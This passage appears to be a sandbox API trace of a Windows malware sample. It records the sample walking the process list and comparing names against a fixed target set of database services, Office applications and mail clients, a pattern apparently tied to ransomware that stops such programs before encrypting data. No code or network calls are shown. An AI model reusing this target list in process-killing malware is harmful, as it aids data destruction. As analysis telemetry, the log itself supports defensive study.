(lpString1="tbirdconfig.exe", lpString2="System") returned 1 [0036.044] lstrcmpiW (lpString1="mydesktopqos.exe", lpString2="System") returned -1 [0036.044] lstrcmpiW (lpString1="ocomm.exe", lpString2="System") returned -1 [0036.044] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0036.044] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0036.044] lstrcmpiW (lpString1="mysqld-opt.exe", lpString2="System") returned -1 [0036.044] lstrcmpiW (lpString1="dbeng50.exe", lpString2="System") returned -1 [0036.044] lstrcmpiW (lpString1="sqbcoreservice.exe", lpString2="System") returned -1 [0036.044] lstrcmpiW (lpString1="excel.exe", lpString2="System") returned -1 [0036.044] lstrcmpiW (lpString1="infopath.exe", lpString2="System") returned -1 [0036.044] lstrcmpiW (lpString1="msaccess.exe", lpString2="System") returned -1 [0036.044] lstrcmpiW (lpString1="mspub.exe", lpString2="System") returned -1 [0036.044] lstrcmpiW (lpString1="onenote.exe", lpString2="System") returned -1 [0036.044] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0036.044] lstrcmpiW (lpString1="powerpnt.exe", lpString2="System") returned -1 [0036.044] lstrcmpiW (lpString1="steam.exe", lpString2="System") returned -1 [0036.044] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0036.044] lstrcmpiW (lpString1="thebat.exe", lpString2="System") returned 1 [0036.044] lstrcmpiW (lpString1="thebat64.exe", lpString2="System") returned 1 [0036.044] lstrcmpiW (lpString1="thunderbird.exe", lpString2="System") returned 1 [0036.044] lstrcmpiW (lpString1="visio.exe", lpString2="System") returned 1 [0036.044] lstrcmpiW (lpString1="winword.exe", lpString2="System") returned 1 [0036.044] lstrcmpiW (lpString1="wordpad.exe", lpString2="System") returned 1 [0036.044] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0036.045] lstrcmpiW (lpString1="msftesql.exe", lpString2="smss.exe") returned -1 [0036.045] lstrcmpiW (lpString1="sqlagent.exe", lpString2="smss.exe") returned 1 [0036.045] lstrcmpiW (lpString1="sqlbrowser.exe", lpString2="smss.exe") returned 1 [0036.045] lstrcmpiW (lpString1="sqlwriter.exe", lpString2="smss.exe") returned 1 [0036.045] lstrcmpiW (lpString1="oracle.exe", lpString2="smss.exe") returned -1 [0036.045] lstrcmpiW (lpString1="ocssd.exe", lpString2="smss.exe") returned -1 [0036.045] lstrcmpiW (lpString1="dbsnmp.exe", lpString2="smss.exe") returned -1 [0036.045] lstrcmpiW (lpString1="synctime.exe", lpString2="smss.exe") returned 1 [0036.045] lstrcmpiW (lpString1="agntsvc.exeisqlplussvc.exe", lpString2="smss.exe") returned -1 [0036.045] lstrcmpiW (lpString1="xfssvccon.exe", lpString2="smss.exe") returned 1 [0036.045] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0036.045] lstrcmpiW (lpString1="mydesktopservice.exe", lpString2="smss.exe") returned -1 [0036.046] lstrcmpiW (lpString1="ocautoupds.exe", lpString2="smss.exe") returned -1 [0036.046] lstrcmpiW (lpString1="agntsvc.exeagntsvc.exe", lpString2="smss.exe") returned -1 [0036.046] lstrcmpiW (lpString1="agntsvc.exeencsvc.exe", lpString2="smss.exe") returned -1 [0036.046] lstrcmpiW (lpString1="firefoxconfig.exe", lpString2="smss.exe") returned -1 [0036.046] lstrcmpiW (lpString1="tbirdconfig.exe", lpString2="smss.exe") returned 1 [0036.046] lstrcmpiW (lpString1="mydesktopqos.exe", lpString2="smss.exe") returned -1 [0036.046] lstrcmpiW (lpString1="ocomm.exe", lpString2="smss.exe") returned -1 [0036.046] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0036.046] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0036.046] lstrcmpiW (lpString1="mysqld-opt.exe", lpString2="smss.exe") returned -1 [0036.046] lstrcmpiW (lpString1="dbeng50.exe", lpString2="smss.exe") returned -1 [0036.046] lstrcmpiW (lpString1="sqbcoreservice.exe", lpString2="smss.exe") returned 1 [0036.046] lstrcmpiW (lpString1="excel.exe", lpString2="smss.exe") returned -1 [0036.046] lstrcmpiW (lpString1="infopath.exe", lpString2="smss.exe") returned -1 [0036.046] lstrcmpiW (lpString1="msaccess.exe", lpString2="smss.exe") returned -1 [0036.046] lstrcmpiW (lpString1="mspub.exe", lpString2="smss.exe") returned -1 [0036.046] lstrcmpiW (lpString1="onenote.exe", lpString2="smss.exe") returned -1 [0036.046] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0036.046] lstrcmpiW (lpString1="powerpnt.exe", lpString2="smss.exe") returned -1 [0036.046] lstrcmpiW (lpString1="steam.exe", lpString2="smss.exe") returned 1 [0036.046] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0036.046] lstrcmpiW (lpString1="thebat.exe", lpString2="smss.exe") returned 1 [0036.046] lstrcmpiW (lpString1="thebat64.exe", lpString2="smss.exe") returned 1 [0036.046] lstrcmpiW (lpString1="thunderbird.exe", lpString2="smss.exe") returned 1 [0036.047] lstrcmpiW (lpString1="visio.exe", lpString2="smss.exe") returned 1 [0036.047] lstrcmpiW (lpString1="winword.exe", lpString2="smss.exe") returned 1 [0036.047] lstrcmpiW (lpString1="wordpad.exe", lpString2="smss.exe") returned 1 [0036.047] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0036.047] lstrcmpiW (lpString1="msftesql.exe", lpString2="csrss.exe") returned 1 [0036.047] lstrcmpiW (lpString1="sqlagent.exe", lpString2="csrss.exe") returned 1 [0036.047] lstrcmpiW (lpString1="sqlbrowser.exe", lpString2="csrss.exe") returned 1 [0036.047] lstrcmpiW (lpString1="sqlwriter.exe", lpString2="csrss.exe") returned 1 [0036.047] lstrcmpiW (lpString1="oracle.exe", lpString2="csrss.exe") returned 1 [0036.047] lstrcmpiW (lpString1="ocssd.exe", lpString2="csrss.exe") returned 1 [0036.047] lstrcmpiW (lpString1="dbsnmp.exe", lpString2="csrss.exe") returned 1 [0036.048] lstrcmpiW (lpString1="synctime.exe", lpString2="csrss.exe") returned 1 [0036.048] lstrcmpiW (lpString1="agntsvc.exeisqlplussvc.exe", lpString2="csrss.exe") returned -1 [0036.048] lstrcmpiW (lpString1="xfssvccon.exe", lpString2="csrss.exe") returned 1 [0036.048] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0036.048] lstrcmpiW (lpString1="mydesktopservice.exe", lpString2="csrss.exe") returned 1 [0036.048] lstrcmpiW (lpString1="ocautoupds.exe", lpString2="csrss.exe") returned 1 [0036.048] lstrcmpiW (lpString1="agntsvc.exeagntsvc.exe", lpString2="csrss.exe") returned -1 [0036.048] lstrcmpiW (lpString1="agntsvc.exeencsvc.exe", lpString2="csrss.exe") returned -1 [0036.048] lstrcmpiW (lpString1="firefoxconfig.exe", lpString2="csrss.exe") returned 1 [0036.048] lstrcmpiW (lpString1="tbirdconfig.exe", lpString2="csrss.exe") returned 1 [0036.048] lstrcmpiW (lpString1="mydesktopqos.exe", lpString2="csrss.exe") returned 1 [0036.048] lstrcmpiW (lpString1="ocomm.exe", lpString2="csrss.exe") returned 1 [0036.048] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0036.048] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0036.048] lstrcmpiW (lpString1="mysqld-opt.exe", lpString2="csrss.exe") returned 1 [0036.048] lstrcmpiW (lpString1="dbeng50.exe", lpString2="csrss.exe") returned 1 [0036.048] lstrcmpiW (lpString1="sqbcoreservice.exe", lpString2="csrss.exe") returned 1 [0036.048] lstrcmpiW (lpString1="excel.exe", lpString2="csrss.exe") returned 1 [0036.048] lstrcmpiW (lpString1="infopath.exe", lpString2="csrss.exe") returned 1 [0036.048] lstrcmpiW (lpString1="msaccess.exe", lpString2="csrss.exe") returned 1 [0036.048] lstrcmpiW (lpString1="mspub.exe", lpString2="csrss.exe") returned 1 [0036.048] lstrcmpiW (lpString1="onenote.exe", lpString2="csrss.exe") returned 1 [0036.048] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0036.048] lstrcmpiW (lpString1="powerpnt.exe", lpString2="csrss.exe") returned 1 [0036.049] lstrcmpiW (lpString1="steam.exe", lpString2="csrss.exe") returned 1 [0036.049] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0036.049] lstrcmpiW (lpString1="thebat.exe", lpString2="csrss.exe") returned 1 [0036.049] lstrcmpiW (lpString1="thebat64.exe", lpString2="csrss.exe") returned 1 [0036.049] lstrcmpiW (lpString1="thunderbird.exe", lpString2="csrss.exe") returned 1 [0036.049] lstrcmpiW (lpString1="visio.exe", lpString2="csrss.exe") returned 1 [0036.049] lstrcmpiW (lpString1="winword.exe", lpString2="csrss.exe") returned 1 [0036.049] lstrcmpiW (lpString1="wordpad.exe", lpString2="csrss.exe") returned 1 [0036.049] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0036.049] lstrcmpiW (lpString1="msftesql.exe", lpString2="wininit.exe") returned -1 [0036.049] lstrcmpiW (lpString1="sqlagent.exe", lpString2="wininit.exe") returned -1 [0036.050] lstrcmpiW (lpString1="sqlbrowser.exe", lpString2="wininit.exe") returned -1 [0036.050] lstrcmpiW (lpString1="sqlwriter.exe", lpString2="wininit.exe") returned -1 [0036.050] lstrcmpiW (lpString1="oracle.exe", lpString2="wininit.exe") returned -1 [0036.050] lstrcmpiW (lpString1="ocssd.exe", lpString2="wininit.exe") returned -1 [0036.050] lstrcmpiW (lpString1="dbsnmp.exe", lpString2="wininit.exe") returned -1 [0036.050] lstrcmpiW (lpString1="synctime.exe", lpString2="wininit.exe") returned -1 [0036.050] lstrcmpiW (lpString1="agntsvc.exeisqlplussvc.exe", lpString2="wininit.exe") returned -1 [0036.050] lstrcmpiW (lpString1="xfssvccon.exe", lpString2="wininit.exe") returned 1 [0036.050] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0036.050] lstrcmpiW (lpString1="mydesktopservice.exe", lpString2="wininit.exe") returned -1 [0036.050] lstrcmpiW (lpString1="ocautoupds.exe", lpString2="wininit.exe") returned -1 [0036.050] lstrcmpiW (lpString1="agntsvc.exeagntsvc.exe", lpString2="wininit.exe") returned -1 [0036.050] lstrcmpiW (lpString1="agntsvc.exeencsvc.exe", lpString2="wininit.exe") returned -1 [0036.050] lstrcmpiW (lpString1="firefoxconfig.exe", lpString2="wininit.exe") returned -1 [0036.050] lstrcmpiW (lpString1="tbirdconfig.exe", lpString2="wininit.exe") returned -1 [0036.050] lstrcmpiW (lpString1="mydesktopqos.exe", lpString2="wininit.exe") returned -1 [0036.050] lstrcmpiW (lpString1="ocomm.exe", lpString2="wininit.exe") returned -1 [0036.050] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0036.050] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0036.050] lstrcmpiW (lpString1="mysqld-opt.exe", lpString2="wininit.exe") returned -1 [0036.050] lstrcmpiW (lpString1="dbeng50.exe", lpString2="wininit.exe") returned -1 [0036.050] lstrcmpiW (lpString1="sqbcoreservice.exe", lpString2="wininit.exe") returned -1 [0036.050] lstrcmpiW (lpString1="excel.exe", lpString2="wininit.exe") returned -1 [0036.050] lstrcmpiW (lpString1="infopath.exe", lpString2="wininit.exe") returned -1 [0036.051] lstrcmpiW (lpString1="msaccess.exe", lpString2="wininit.exe") returned -1 [0036.051] lstrcmpiW (lpString1="mspub.exe", lpString2="wininit.exe") returned -1 [0036.051] lstrcmpiW (lpString1="onenote.exe", lpString2="wininit.exe") returned -1 [0036.051] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0036.051] lstrcmpiW (lpString1="powerpnt.exe", lpString2="wininit.exe") returned -1 [0036.051] lstrcmpiW (lpString1="steam.exe", lpString2="wininit.exe") returned -1 [0036.051] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0036.051] lstrcmpiW (lpString1="thebat.exe", lpString2="wininit.exe") returned -1 [0036.051] lstrcmpiW (lpString1="thebat64.exe", lpString2="wininit.exe") returned -1 [0036.051] lstrcmpiW (lpString1="thunderbird.exe", lpString2="wininit.exe") returned -1 [0036.051] lstrcmpiW (lpString1="visio.exe", lpString2="wininit.exe") returned -1 [0036.051] lstrcmpiW (lpString1="winword.exe", lpString2="wininit.exe") returned 1 [0036.051] lstrcmpiW (lpString1="wordpad.exe", lpString2="wininit.exe") returned 1 [0036.051] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0036.052] lstrcmpiW (lpString1="msftesql.exe", lpString2="csrss.exe") returned 1 [0036.052] lstrcmpiW (lpString1="sqlagent.exe", lpString2="csrss.exe") returned 1 [0036.052] lstrcmpiW (lpString1="sqlbrowser.exe", lpString2="csrss.exe") returned 1 [0036.052] lstrcmpiW (lpString1="sqlwriter.exe", lpString2="csrss.exe") returned 1 [0036.052] lstrcmpiW (lpString1="oracle.exe", lpString2="csrss.exe") returned 1 [0036.052] lstrcmpiW (lpString1="ocssd.exe", lpString2="csrss.exe") returned 1 [0036.052] lstrcmpiW (lpString1="dbsnmp.exe", lpString2="csrss.exe") returned 1 [0036.052] lstrcmpiW (lpString1="synctime.exe", lpString2="csrss.exe") returned 1 [0036.052] lstrcmpiW (lpString1="agntsvc.exeisqlplussvc.exe", lpString2="csrss.exe") returned -1 [0036.052] lstrcmpiW (lpString1="xfssvccon.exe", lpString2="csrss.exe") returned 1 [0036.052] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0036.052] lstrcmpiW (lpString1="mydesktopservice.exe", lpString2="csrss.exe") returned 1 [0036.052] lstrcmpiW (lpString1="ocautoupds.exe", lpString2="csrss.exe") returned 1 [0036.052] lstrcmpiW (lpString1="agntsvc.exeagntsvc.exe", lpString2="csrss.exe") returned -1 [0036.052] lstrcmpiW (lpString1="agntsvc.exeencsvc.exe", lpString2="csrss.exe") returned -1 [0036.052] lstrcmpiW (lpString1="firefoxconfig.exe", lpString2="csrss.exe") returned 1 [0036.052] lstrcmpiW (lpString1="tbirdconfig.exe", lpString2="csrss.exe") returned 1 [0036.052] lstrcmpiW (lpString1="mydesktopqos.exe", lpString2="csrss.exe") returned 1 [0036.052] lstrcmpiW (lpString1="ocomm.exe", lpString2="csrss.exe") returned 1 [0036.052] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0036.052] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0036.053] lstrcmpiW (lpString1="mysqld-opt.exe", lpString2="csrss.exe") returned 1 [0036.053] lstrcmpiW (lpString1="dbeng50.exe", lpString2="csrss.exe") returned 1 [0036.053] lstrcmpiW (lpString1="sqbcoreservice.exe", lpString2="csrss.exe") returned 1 [0036.053] lstrcmpiW (lpString1="excel.exe", lpString2="csrss.exe") returned 1 [0036.053] lstrcmpiW (lpString1="infopath.exe", lpString2="csrss.exe") returned 1 [0036.053] lstrcmpiW (lpString1="msaccess.exe", lpString2="csrss.exe") returned 1 [0036.053] lstrcmpiW (lpString1="mspub.exe", lpString2="csrss.exe") returned 1 [0036.053] lstrcmpiW (lpString1="onenote.exe", lpString2="csrss.exe") returned 1 [0036.053] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0036.053] lstrcmpiW (lpString1="powerpnt.exe", lpString2="csrss.exe") returned 1 [0036.055] lstrcmpiW (lpString1="steam.exe", lpString2="csrss.exe") returned 1 [0036.058] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0036.058] lstrcmpiW (lpString1="thebat.exe", lpString2="csrss.exe") returned 1 [0036.058] lstrcmpiW (lpString1="thebat64.exe", lpString2="csrss.exe") returned 1 [0036.058] lstrcmpiW (lpString1="thunderbird.exe", lpString2="csrss.exe") returned 1 [0036.058] lstrcmpiW (lpString1="visio.exe", lpString2="csrss.exe") returned 1 [0036.058] lstrcmpiW (lpString1="winword.exe", lpString2="csrss.exe") returned 1 [0036.058] lstrcmpiW (lpString1="wordpad.exe", lpString2="csrss.exe") returned 1 [0036.058] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0036.059] lstrcmpiW (lpString1="msftesql.exe", lpString2="winlogon.exe") returned -1 [0036.059] lstrcmpiW (lpString1="sqlagent.exe", lpString2="winlogon.exe") returned -1 [0036.059] lstrcmpiW (lpString1="sqlbrowser.exe", lpString2="winlogon.exe") returned -1 [0036.059] lstrcmpiW (lpString1="sqlwriter.exe", lpString2="winlogon.exe") returned -1 [0036.059] lstrcmpiW (lpString1="oracle.exe", lpString2="winlogon.exe") returned -1 [0036.059] lstrcmpiW (lpString1="ocssd.exe", lpString2="winlogon.exe") returned -1 [0036.059] lstrcmpiW (lpString1="dbsnmp.exe", lpString2="winlogon.exe") returned -1 [0036.059] lstrcmpiW (lpString1="synctime.exe", lpString2="winlogon.exe") returned -1 [0036.059] lstrcmpiW (lpString1="agntsvc.exeisqlplussvc.exe", lpString2="winlogon.exe") returned -1 [0036.059] lstrcmpiW (lpString1="xfssvccon.exe", lpString2="winlogon.exe") returned 1 [0036.059] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0036.059] lstrcmpiW (lpString1="mydesktopservice.exe", lpString2="winlogon.exe") returned -1 [0036.059] lstrcmpiW (lpString1="ocautoupds.exe", lpString2="winlogon.exe") returned -1 [0036.059] lstrcmpiW (lpString1="agntsvc.exeagntsvc.exe", lpString2="winlogon.exe") returned -1 [0036.059] lstrcmpiW (lpString1="agntsvc.exeencsvc.exe", lpString2="winlogon.exe") returned -1 [0036.059] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x194, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0036.060] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x194, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0036.061] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.061] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.062] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0036.062] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.063] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.064] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.064] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x39, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.065] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.066] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x264, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.066] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0036.067] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.067] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.068] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0036.068] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.069] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x378, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0036.070] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x378, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0036.070] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x42, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0036.071] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0036.072] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0036.072] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0036.073] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x378, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0036.073] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x378, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0036.074] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xb64, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0036.074] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="beds-rice-judgment-op.exe")) returned 1 [0036.075] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="seanusingreceiverlegislature.exe")) returned 1 [0036.076] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="textile_shadow_advantages.exe")) returned 1 [0036.076] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="halo.exe")) returned 1 [0036.077] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, 